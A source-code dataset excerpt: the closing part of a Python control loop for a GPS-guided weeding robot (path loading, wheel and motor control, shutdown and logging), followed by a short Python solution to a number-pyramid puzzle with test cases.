config.GAIN_RANGE_FROM, config.GAIN_RANGE_TO,
config.EXPOSURE_TIME_RANGE_FROM, config.EXPOSURE_TIME_RANGE_TO,
config.AE_LOCK, config.CAMERA_W, config.CAMERA_H, config.CAMERA_W,
config.CAMERA_H, config.CAMERA_FRAMERATE,
config.CAMERA_FLIP_METHOD) as camera, \
ExtractionManagerV3(smoothie, camera, logger_full, data_collector, image_saver,
log_cur_dir, periphery_detector, precise_detector,
config.CAMERA_POSITIONS, config.PDZ_DISTANCES, vesc_engine) as extraction_manager_v3, \
navigation.NavigationPrediction(
logger_full=logger_full,
nav=nav,
log_cur_dir=log_cur_dir) as navigation_prediction:
# try to load field ABCD points
field_gps_coords = None
field_name = None
if config.USE_EMERGENCY_FIELD_GENERATION and not config.CONTINUE_PREVIOUS_PATH:
field_gps_coords = emergency_field_defining(vesc_engine, gps, nav, log_cur_dir, logger_full)
else:
# check if shortcut exists
if os.path.isfile(config.INPUT_GPS_FIELD_FILE):
# check if shortcut target file exists
# old way: shortcut_target_path = subprocess.check_output(['readlink', '-f', config.INPUT_GPS_FIELD_FILE]).decode("utf-8").strip()
shortcut_target_path = os.path.realpath(config.INPUT_GPS_FIELD_FILE)
field_name = (shortcut_target_path.split("/")[-1]).split(".")[0]
if os.path.isfile(shortcut_target_path):
msg = f"Loading '{config.INPUT_GPS_FIELD_FILE}' field file"
logger_full.write(msg + "\n")
try:
field_gps_coords = load_coordinates(config.INPUT_GPS_FIELD_FILE) # [A, B, C, D]
except ValueError:
msg = f"Failed to load field '{shortcut_target_path}' due " \
f"to ValueError (file is likely corrupted)"
print(msg)
logger_full.write(msg + "\n")
msg = f"Loaded field: {str(field_gps_coords)}"
print(msg)
logger_full.write(msg + "\n")
else:
msg = f"Couldn't find '{os.path.realpath(config.INPUT_GPS_FIELD_FILE)}' target file with" \
f"field points"
print(msg)
logger_full.write(msg + "\n")
else:
msg = f"Couldn't find '{config.INPUT_GPS_FIELD_FILE}' shortcut file with field points"
print(msg)
logger_full.write(msg + "\n")
# set field to notification
if config.CONTINUOUS_INFORMATION_SENDING:
if field_gps_coords is None:
msg = f"Sending field to notification is aborted as field is None"
print(msg)
logger_full.write(msg)
elif field_name is None:
msg = f"Sending field to notification is aborted as field name is None"
print(msg)
logger_full.write(msg)
elif len(field_gps_coords) < 1:
msg = f"Loaded '{shortcut_target_path}' field contains 0" \
f"points. Sending to notification is aborted."
print(msg)
logger_full.write(msg + "\n")
else:
notification.set_field(field_gps_coords.copy(), field_name)
# continue previous path case
loading_previous_path_failed = False
loading_previous_index_failed = False
if config.CONTINUE_PREVIOUS_PATH:
# TODO: maybe make a path manager and put field and path loading and checking etc there
msg = "Loading previous path points"
logger_full.write(msg + "\n")
if not os.path.isfile(config.PREVIOUS_PATH_POINTS_FILE):
loading_previous_path_failed = True
msg = f"Couldn't find '{config.PREVIOUS_PATH_POINTS_FILE}' file with previous path points. " \
f"Trying to generate path points of current field from scratch."
print(msg)
logger_full.write(msg + "\n")
else:
# data validation is done later as it needed both to loaded and new generated path
with open(config.PREVIOUS_PATH_POINTS_FILE, "rb") as path_points_file:
path_points = pickle.load(path_points_file)
if not os.path.isfile(config.PREVIOUS_PATH_INDEX_FILE):
loading_previous_index_failed = True
msg = f"Couldn't find '{config.PREVIOUS_PATH_INDEX_FILE}' file with point index to continue."
print(msg)
logger_full.write(msg + "\n")
else:
with open(config.PREVIOUS_PATH_INDEX_FILE, "r+") as path_index_file:
str_index = path_index_file.readline().strip()
try:
path_start_index = int(str_index)
except ValueError:
loading_previous_index_failed = True
msg = f"Couldn't convert path point index '{str_index}' into int."
print(msg)
logger_full.write(msg + "\n")
if path_start_index == -1:
msg = "Previous path is already passed"
print(msg)
logger_full.write_and_flush(msg + "\n")
notification.close()
exit()
elif path_start_index >= len(path_points) or path_start_index < 1:
loading_previous_index_failed = True
msg = f"Path start index {path_start_index} is out of path points list range (loaded " \
f"{len(path_points)} points)"
print(msg)
logger_full.write(msg + "\n")
if loading_previous_index_failed:
msg = "Creating new path index storage file, and going to start this field from 1rst point " \
"due to index loading troubles (see log above for details)"
print(msg)
logger_full.write(msg + "\n")
path_start_index = 1
with open(config.PREVIOUS_PATH_INDEX_FILE, "w") as path_index_file:
path_index_file.write(str(path_start_index))
# load field points and generate new path or continue previous path errors case
if not config.CONTINUE_PREVIOUS_PATH or loading_previous_path_failed:
if field_gps_coords is None:
msg = f"Exiting main as building path without field points is impossible"
print(msg)
logger_full.write_and_flush(msg)
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# check field corner points count
if len(field_gps_coords) == 4:
field_gps_coords = reduce_field_size(
field_gps_coords, config.FIELD_REDUCE_SIZE, nav)
msg = "Reduced field: " + str(field_gps_coords)
print(msg)
logger_full.write(msg + "\n")
# generate path points
path_start_index = 1
if config.TRADITIONAL_PATH:
path_points = build_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
elif config.BEZIER_PATH:
path_points = build_bezier_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
elif config.FORWARD_BACKWARD_PATH:
path_points = build_forward_backward_path(
field_gps_coords,
nav,
logger_full,
config.SI_SPEED_FWD,
config.SI_SPEED_REV)
msg = "Generated " + str(len(path_points)) + " points."
logger_full.write(msg + "\n")
elif len(field_gps_coords) == 2:
path_start_index = 1
path_points = field_gps_coords
else:
msg = "Expected 4 or 2 gps corner points, got " + str(len(field_gps_coords)) + "\nField:\n" + str(
field_gps_coords)
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# save path points and point to start from index
with open(config.PREVIOUS_PATH_POINTS_FILE, "wb") as path_points_file:
pickle.dump(path_points, path_points_file)
with open(config.PREVIOUS_PATH_INDEX_FILE, "w") as path_index_file:
path_index_file.write(str(path_start_index))
if len(path_points) > 0:
save_gps_coordinates(
path_points, log_cur_dir + "current_path_points.txt")
msg = "Current path points are successfully saved."
print(msg)
logger_full.write(msg + "\n")
else:
msg = "List of path points is empty, saving canceled."
print(msg)
logger_full.write(msg + "\n")
if len(path_points) < 2:
msg = "Expected at least 2 points in path, got " + str(len(path_points)) + \
" instead (1st point is starting point)."
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# set smoothie's A axis to 0 (nav turn wheels)
response = smoothie.set_current_coordinates(A=0)
if response != smoothie.RESPONSE_OK:
msg = "Failed to set A=0 on smoothie (turning wheels init position), response message:\n" + response
print(msg)
logger_full.write(msg + "\n")
"""
# ask permission to start moving
msg = "Initializing done. Press enter to start moving."
input(msg)
logger_full.write(msg + "\n")
"""
msg = 'GpsQ|Raw ang|Res ang|Ord ang|Sum ang|Distance |Adapter|Smoothie|PointStatus|deviation|side dev|' \
'centroid factor|cruise factor'
print(msg)
logger_full.write(msg + "\n")
# path points visiting loop
with open(
config.PREVIOUS_PATH_INDEX_FILE,
"r+" if os.path.isfile(config.PREVIOUS_PATH_INDEX_FILE) else "w") as path_index_file:
# TODO: temp. wheels mechanics hotfix. please don't repeat things I did here they are not good.
if config.ENABLE_ADDITIONAL_WHEELS_TURN:
if config.TRADITIONAL_PATH:
msg = f"wheels additional turn is enabled (cur. config.ENABLE_ADDITIONAL_WHEELS_TURN=True), " \
f"and it's not compatible with traditional path (cur. config.TRADITIONAL_PATH=True)"
raise RuntimeError(msg)
if not config.BEZIER_PATH:
msg = f"wheels additional turn is enabled, and it's compatible only with bezier path " \
f"(cur. config.BEZIER_PATH=False)"
raise RuntimeError(msg)
if config.FORWARD_BACKWARD_PATH:
msg = f"wheels additional turn is enabled, and it's not compatible with forward-backward " \
f"path building option (cur. config.FORWARD_BACKWARD_PATH=True)"
raise RuntimeError(msg)
if config.ADD_CORNER_TO_BEZIER_PATH:
msg = f"wheels additional turn is enabled, and it's not compatible with " \
f"ADD_CORNER_TO_BEZIER_PATH building path option " \
f"(cur. config.ADD_CORNER_TO_BEZIER_PATH=True)"
raise RuntimeError(msg)
smoothie_tel_conn = None
try:
bezier_points_indexes = get_bezier_indexes(path_points)
smoothie_tel_conn = connectors.SmoothieV11TelnetConnector(config.SMOOTHIE_TELNET_HOST)
smoothie_tel_conn.write("G91")
res = smoothie_tel_conn.read_some()
if res != smoothie.RESPONSE_OK:
msg = f"Couldn't set smoothie telnet connection to relative mode:\n{res}\n" \
f"Telnet connection usage will be disabled."
print(msg)
logger_full.write(msg + "\n")
smoothie_tel_conn = None
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
msg = f"Wheels additional turn preparations are failed:\n" \
f"{traceback.format_exc()}\n" \
f"Telnet connection usage will be disabled."
print(msg)
logger_full.write(msg + "\n")
smoothie_tel_conn = None
next_calibration_time = time.time() + config.CORK_CALIBRATION_MIN_TIME
try:
start_position = utility.average_point(
gps, trajectory_saver, nav)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
if ui_msg_queue is not None:
try:
ui_msg_queue.send(json.dumps({"start": True}))
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
pass
last_direction_of_travel = None # 1 -> moving forward #-1 -> moving backward
if config.NAVIGATION_TEST_MODE:
path_end_index = sys.maxsize
else:
path_end_index = len(path_points)
# applies improved approaching to path during continuing previous field job
if config.CONTINUE_PREVIOUS_PATH and config.USE_SMOOTH_APPROACHING_TO_FIELD:
smooth_preparation_ok = True
if config.TRADITIONAL_PATH:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as traditional path is not supported by smooth " \
"approaching feature."
logger_full.write(msg + "\n")
elif config.BEZIER_PATH:
traj_path_start_index = path_start_index
cur_pos = gps.get_fresh_position()
# speed 0 is abnormal TODO what robot should do in this case?
if math.isclose(path_points[traj_path_start_index][1], 0):
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as point (path_points[{traj_path_start_index}])" \
f" speed is 0 (look at generated path points, speed 0 is not ok)."
logger_full.write(msg + "\n")
# zigzag (speed < 0)
elif path_points[traj_path_start_index][1] < 0:
# skip negative speed points until positive speed or path end
log_traj_start_idx = traj_path_start_index
traj_path_start_index += 1
while traj_path_start_index < len(path_points):
if path_points[traj_path_start_index][1] > 0 and not math.isclose(
path_points[traj_path_start_index][1], 0):
break
traj_path_start_index += 1
else:
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as couldn't find any points " \
f"(from {log_traj_start_idx} to {traj_path_start_index}) with positive speed " \
f"to continue zigzag."
logger_full.write(msg + "\n")
# spiral or zigzag (speed > 0)
else:
# prev point speed 0 is abnormal TODO what robot should do in this case?
if math.isclose(path_points[traj_path_start_index - 1][1], 0):
smooth_preparation_ok = False
msg = f"USING RUDE TRAJECTORY APPROACHING as point (path_points[" \
f"{traj_path_start_index - 1}]) speed is 0 (look at generated path points, " \
f"speed 0 is not ok)."
logger_full.write(msg + "\n")
# spiral
elif path_points[traj_path_start_index - 1][1] > 0:
# generate non bezier indexes
a_non_bezier_indexes = [0] # A points
b_non_bezier_indexes = [1] # B points
while traj_path_start_index > b_non_bezier_indexes[-1]:
a_non_bezier_indexes.append(
a_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
b_non_bezier_indexes.append(
b_non_bezier_indexes[-1] + config.NUMBER_OF_BEZIER_POINT)
# look for index of point which will be used to get the robot to trajectory
# ABAP correct angle: -180 to -90 or 170 to 180
# BAAP correct angle: -10 to 90 (using this)
for point_a_idx, point_b_idx in zip(reversed(a_non_bezier_indexes),
reversed(b_non_bezier_indexes)):
angle = nav.get_angle(
path_points[point_b_idx][0],
path_points[point_a_idx][0],
path_points[point_a_idx][0],
cur_pos)
if -10 <= angle <= 90:
traj_path_start_index = point_a_idx
break
else:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as couldn't find any previous point " \
"with a satisfactory angle to get on trajectory."
logger_full.write(msg + "\n")
# zigzag (prev point speed is negative)
else:
# skip negative speed points until positive speed or path end
traj_path_start_index += 1
while traj_path_start_index < len(path_points):
if path_points[traj_path_start_index][1] > 0 and not math.isclose(
path_points[traj_path_start_index][1], 0):
break
traj_path_start_index += 1
else:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as couldn't find any further points " \
"with positive speed to continue zigzag job."
logger_full.write(msg + "\n")
# check if robot tries to skip or revert too many path points
if abs(traj_path_start_index - path_start_index) > config.SMOOTH_APPROACHING_MAX_POINTS:
smooth_preparation_ok = False
msg = f"Robot wants to visit too many previous points or skip too many job points; " \
f"traj_start_idx={traj_path_start_index}; path_start_idx={path_start_index}, exiting."
logger_full.write(msg + "\n")
# approach trajectory smoothly if preparation was successful
if smooth_preparation_ok:
# for future points (nav predictor)
i_inf = traj_path_start_index + 1 if traj_path_start_index + 1 < path_end_index \
else path_end_index
i_sup = traj_path_start_index + 1 + config.FUTURE_NUMBER_OF_POINTS \
if traj_path_start_index + config.FUTURE_NUMBER_OF_POINTS < path_end_index \
else path_end_index
# if smooth approach target point is or further than job start point
# (move to this point and start job)
move_to_point_and_extract(
[cur_pos, path_points[traj_path_start_index][0]],
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
path_points[traj_path_start_index][1],
False,
navigation_prediction,
path_points[i_inf:i_sup],
not config.FIRST_POINT_NO_EXTRACTIONS,
x_scan_poly,
field_gps_coords
)
if traj_path_start_index >= path_start_index:
path_start_index = traj_path_start_index + 1
else:
for i in range(traj_path_start_index + 1, path_start_index - 1):
i_inf = i + 1 if i + 1 < path_end_index else path_end_index
i_sup = i + 1 + config.FUTURE_NUMBER_OF_POINTS \
if i + config.FUTURE_NUMBER_OF_POINTS < path_end_index else path_end_index
move_to_point_and_extract(
[path_points[i - 1][0], path_points[i][0]],
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
path_points[i][1],
False,
navigation_prediction,
path_points[i_inf:i_sup],
not config.FIRST_POINT_NO_EXTRACTIONS,
x_scan_poly,
field_gps_coords
)
elif config.FORWARD_BACKWARD_PATH:
msg = "USING RUDE TRAJECTORY APPROACHING as forward-backward path is not supported yet by " \
"smooth approaching feature."
logger_full.write(msg + "\n")
else:
msg = "USING RUDE TRAJECTORY APPROACHING as all known/supported path generation modes are " \
"disabled, probably config path generation settings are corrupted"
logger_full.write(msg + "\n")
# move through path points
for i in range(path_start_index, path_end_index):
if config.NAVIGATION_TEST_MODE:
dist_here_point_a = nav.get_distance(
start_position, config.POINT_A[0])
dist_here_point_b = nav.get_distance(
start_position, config.POINT_B[0])
if dist_here_point_a > dist_here_point_b:
from_to = [config.POINT_B[0], config.POINT_A[0]]
speed = config.POINT_A[1]
else:
from_to = [config.POINT_A[0], config.POINT_B[0]]
speed = config.POINT_B[1]
display_instruction_path = from_to[0:2]
else:
from_to = [path_points[i - 1][0], path_points[i][0]]
speed = path_points[i][1]
i_inf = i-config.DELTA_DISPLAY_INSTRUCTION_PATH if i >= config.DELTA_DISPLAY_INSTRUCTION_PATH else 0
i_sup = i+config.DELTA_DISPLAY_INSTRUCTION_PATH if i + \
config.DELTA_DISPLAY_INSTRUCTION_PATH < path_end_index else path_end_index-1
display_instruction_path = [elem[0]
for elem in path_points[i_inf:i_sup]]
if ui_msg_queue is not None and config.DISPLAY_INSTRUCTION_PATH:
ui_msg_queue.send(json.dumps(
{"display_instruction_path": display_instruction_path}))
if last_direction_of_travel is None:
# 1 -> moving forward #-1 -> moving backward
last_direction_of_travel = (speed >= 0) if 1 else -1
# 1 -> moving forward #-1 -> moving backward
direction_of_travel = (speed >= 0) if 1 else -1
if direction_of_travel != last_direction_of_travel:
vesc_engine.set_target_rpm(
speed * config.MULTIPLIER_SI_SPEED_TO_RPM, vesc_engine.PROPULSION_KEY)
if config.WHEELS_STRAIGHT_CHANGE_DIRECTION_OF_TRAVEL and direction_of_travel != last_direction_of_travel:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK:
msg = "Smoothie response is not ok: " + response
print(msg)
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
i_inf = i + 1 if i + 1 < path_end_index else path_end_index
i_sup = i + 1 + config.FUTURE_NUMBER_OF_POINTS \
if i + config.FUTURE_NUMBER_OF_POINTS < path_end_index else path_end_index
move_to_point_and_extract(
from_to,
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
speed,
False,
navigation_prediction,
path_points[i_inf:i_sup],
not i == path_start_index
if config.FIRST_POINT_NO_EXTRACTIONS and config.CONTINUE_PREVIOUS_PATH and
not config.USE_SMOOTH_APPROACHING_TO_FIELD else True,
x_scan_poly,
field_gps_coords
)
if config.ENABLE_ADDITIONAL_WHEELS_TURN and \
i - 1 in bezier_points_indexes and i in bezier_points_indexes:
cur_pos = gps.get_last_position()
if cur_pos[2] != "4":
msg = f"Additional wheels turn got point {cur_pos} with non 4 quality - " \
f"skipping wheels turn actions"
logger_full.write(msg + "\n")
else:
deviation, side = nav.get_deviation(path_points[i-1][0], path_points[i][0], cur_pos)
if deviation > config.ADDITIONAL_WHEELS_TURN_THRESHOLD and side == -1:
msg = f"Wheels turn deviation threshold hit, trying to turn wheels"
logger_full.write(msg + "\n")
if smoothie_tel_conn is not None:
smoothie_tel_conn.write(
f"G0 {config.ADDITIONAL_WHEELS_KEY}"
f"{config.ADDITIONAL_WHEELS_VALUE} "
f"F{config.ADDITIONAL_WHEELS_FORCE}")
res = smoothie_tel_conn.read_some()
if res != smoothie.RESPONSE_OK:
msg = f"Couldn't do additional wheels turn, smoothie response:\n{res}"
logger_full.write(msg + "\n")
else:
msg = f"Couldn't turn wheels as smoothie telnet connector is None"
logger_full.write(msg + "\n")
if config.NAVIGATION_TEST_MODE:
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK: # TODO: what if response is not ok?
msg = "Couldn't turn wheels before other navigation test, smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
test_continue = input(
"Press enter to continue the test, type anything to exit.")
if test_continue != "":
notification.close()
break
try:
start_position = utility.average_point(
gps, trajectory_saver, nav)
except:
pass
if ui_msg_queue is not None:
ui_msg_queue.send(json.dumps({"clear_path": True}))
# reload config if kp or ki change
importlib.reload(config)
# 1 -> moving forward #-1 -> moving backward
last_direction_of_travel = (speed >= 0) if 1 else -1
# save path progress (index of next point to move)
path_index_file.seek(0)
path_index_file.write(str(i + 1))
path_index_file.flush()
"""
msg = "Starting memory cleaning"
logger_full.write(msg + "\n")
cleaning_start_t = time.time()
memory_manager.start_clean_manual_blocking()
cleaning_end_t = time.time()
msg = "Cleaning elapsed time: " + str(cleaning_end_t - cleaning_start_t)
logger_full.write(msg + "\n")
"""
# calibration
if time.time() > next_calibration_time:
msg = "Calibrating cork after reaching path point. Current config.CORK_CALIBRATION_MIN_TIME is "\
+ str(config.CORK_CALIBRATION_MIN_TIME)
logger_full.write(msg + "\n")
next_calibration_time = time.time() + config.CORK_CALIBRATION_MIN_TIME
smoothie.ext_calibrate_cork()
# mark path as passed (set next point index to -1)
path_index_file.seek(0)
path_index_file.write(str(-1))
path_index_file.flush()
msg = "Path is successfully passed."
print(msg)
logger_full.write(msg + "\n")
notification.close()
except KeyboardInterrupt:
msg = "Stopped by a keyboard interrupt (Ctrl + C)\n" + \
traceback.format_exc()
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.ENABLED)
notification.close()
if ui_msg_queue is not None:
ui_msg_queue.close()
except:
msg = "Exception occurred:\n" + traceback.format_exc()
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
if ui_msg_queue is not None:
ui_msg_queue.close()
finally:
# put the wheel straight
# vesc z axis calibration in case it's used for z axis control instead of smoothie
# (to prevent cork breaking when smoothie calibrates)
smoothie_safe_calibration = True
if config.EXTRACTION_CONTROLLER == 2:
with adapters.VescAdapterV4(
vesc_address,
config.VESC_BAUDRATE,
config.VESC_ALIVE_FREQ,
config.VESC_CHECK_FREQ,
config.VESC_STOPPER_CHECK_FREQ) as vesc_engine:
# Z-5 fix (move cork little down to stop touching stopper)
vesc_engine.set_target_rpm(
config.VESC_EXTRACTION_CALIBRATION_Z5_FIX_RPM, vesc_engine.EXTRACTION_KEY)
vesc_engine.set_time_to_move(
config.VESC_EXTRACTION_CALIBRATION_Z5_FIX_TIME,
vesc_engine.EXTRACTION_KEY)
vesc_engine.start_moving(vesc_engine.EXTRACTION_KEY)
vesc_engine.wait_for_stop(vesc_engine.EXTRACTION_KEY)
# calibration
vesc_engine.set_target_rpm(
config.VESC_EXTRACTION_CALIBRATION_RPM, vesc_engine.EXTRACTION_KEY)
vesc_engine.set_time_to_move(
config.VESC_EXTRACTION_CALIBRATION_MAX_TIME,
vesc_engine.EXTRACTION_KEY)
vesc_engine.start_moving(vesc_engine.EXTRACTION_KEY)
res = vesc_engine.wait_for_stopper_hit(
vesc_engine.EXTRACTION_KEY,
config.VESC_EXTRACTION_CALIBRATION_MAX_TIME)
vesc_engine.stop_moving(vesc_engine.EXTRACTION_KEY)
if not res:
smoothie_safe_calibration = False
print(
"Stopped vesc EXTRACTION engine calibration due timeout (stopper signal wasn't received)\n",
"WHEELS POSITION WILL NOT BE SAVED PROPERLY!", sep="")
# put the robot's wheels straight
if smoothie_safe_calibration:
msg = f"Trying to put wheels straight before shutdown"
logger_full.write(msg + "\n")
if os.path.isfile(config.LAST_ANGLE_WHEELS_FILE):
msg = f"Found '{config.LAST_ANGLE_WHEELS_FILE}' file, trying to read wheels smoothie position"
logger_full.write(msg + "\n")
with open(config.LAST_ANGLE_WHEELS_FILE, "r+") as wheels_angle_file:
line = wheels_angle_file.read().strip()
angle = None
try:
angle = float(line)
msg = f"Successfully loaded wheels smoothie position: {angle}"
logger_full.write(msg + "\n")
except ValueError:
msg = f"Couldn't convert '{line}' into float position, leaving wheels position as it is"
print(msg)
logger_full.write(msg + "\n")
if angle is not None:
with adapters.SmoothieAdapter(smoothie_address) as smoothie:
smoothie.set_current_coordinates(A=angle)
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK:
msg = "Couldn't turn wheels before shutdown, smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
wheels_angle_file.seek(0)
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
else:
msg = f"Couldn't find '{config.LAST_ANGLE_WHEELS_FILE}' wheels smoothie position file.\n" \
f"Creating new file with 0.0 position containing. Robot may navigate wrong of wheels are turned."
print(msg)
logger_full.write(msg + "\n")
with open(config.LAST_ANGLE_WHEELS_FILE, "w") as wheels_angle_file:
wheels_angle_file.write("0.0")
# save adapter points history
try:
# TODO: reduce history positions to 1 to save RAM
# TODO: gps adapter is blocking now if has no points
adapter_points_history = gps.get_last_positions_list()
if len(adapter_points_history) > 0:
save_gps_coordinates(adapter_points_history,
log_cur_dir + "adapter_gps_history.txt")
else:
msg = "adapter_gps_history list has 0 elements!"
print(msg)
logger_full.write(msg + "\n")
except:
pass
# save session statistics TODO: its temporary
msg = "Saving statistics..."
logger_full.write(msg + "\n")
print(msg)
try:
data_collector.save_all_data(
log_cur_dir + config.STATISTICS_OUTPUT_FILE)
data_collector.dump_to_file(
log_cur_dir + config.DATACOLLECTOR_SAVE_FILE)
except:
msg = "Failed to save txt statistics:\n" + traceback.format_exc()
logger_full.write(msg + "\n")
print(msg)
try:
data_collector.close()
except:
msg = "Failed to close properly DB:\n" + traceback.format_exc()
logger_full.write(msg + "\n")
print(msg)
# close log and hardware connections
msg = "Closing loggers..."
logger_full.write_and_flush(msg + "\n")
print(msg)
logger_full.close()
try:
posix_ipc.unlink_message_queue(config.QUEUE_NAME_UI_MAIN)
except:
pass
if detection.YoloDarknetDetector.webStream is not None:
detection.YoloDarknetDetector.webStream.terminate()
detection.YoloDarknetDetector.webStream.join()
print("Safe disable is done.")
if __name__ == '__main__':
main()
|
998,399 | 07a759768ad3d79af0531dd7f9e6f8dbde2191e6 | def printgrid(arr):
for ar in arr:
print(ar)
return 0
def solution(blocks):
res = []
grid = [[0]*(i+1) for i in range(len(blocks))]
# printgrid(grid)
for i, b in enumerate(blocks):
idx, val = b
# print(i, idx, val)
grid[i][idx] = val
for j in range(idx-1, -1, -1): # go left
# print("left:", j)
grid[i][j] = grid[i-1][j] - grid[i][j+1]
for j in range(idx+1, i+1): # go right
# print("right:", j)
grid[i][j] = grid[i-1][j-1] - grid[i][j-1]
# printgrid(grid)
#print grid
for g in grid:
for el in g:
res.append(el)
return res
# return [92, 72, 20, 63, 9, 11, 144, -81, 90, -79, 217, -73, -8, 98, -177]
if __name__ == "__main__":
inputs = []
answers = []
prob = [[0, 50], [0, 22], [2, 10], [1, 4], [4, -13]]
ans = [50, 22, 28, 4, 18, 10, 0, 4, 14, -4, 1, -1, 5, 9, -13]
inputs.append(prob)
answers.append(ans)
prob = [[0, 92], [1, 20], [2, 11], [1, -81], [3, 98]]
ans = [92, 72, 20, 63, 9, 11, 144, -81, 90, -79, 217, -73, -8, 98, -177]
inputs.append(prob)
answers.append(ans)
for ele, an in zip(inputs, answers):
ansarr = solution(ele)
print("correct?: {}".format(ansarr == an))
print("predict: {}".format(ansarr))
print("answer: {}".format(an)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.